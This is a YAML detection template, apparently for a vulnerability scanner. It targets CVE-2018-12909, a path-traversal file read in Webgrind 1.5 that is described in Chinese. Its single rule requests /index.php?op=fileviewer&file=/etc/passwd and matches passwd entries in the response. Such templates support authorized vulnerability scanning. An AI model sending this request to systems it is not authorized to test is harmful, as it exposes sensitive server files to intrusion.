id: CVE-2018-12909

info:
  name: Webgrind fileviewer.phtml 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |
    Webgrind是一套PHP执行时间分析工具。其中Webgrind 1.5版本中存在安全漏洞，该漏洞源于程序依靠用户输入来显示文件。攻击者可以通过漏洞读取服务器敏感文件
    app="Webgrind"
  reference:
    - http://wiki.peiqi.tech/wiki/webapp/Webgrind/Webgrind%20fileviewer.phtml%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-12909.html

rules:
  r0:
    request:
      method: GET
      path: /index.php?op=fileviewer&file=/etc/passwd
      headers:
        Cookie: redirect=1
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()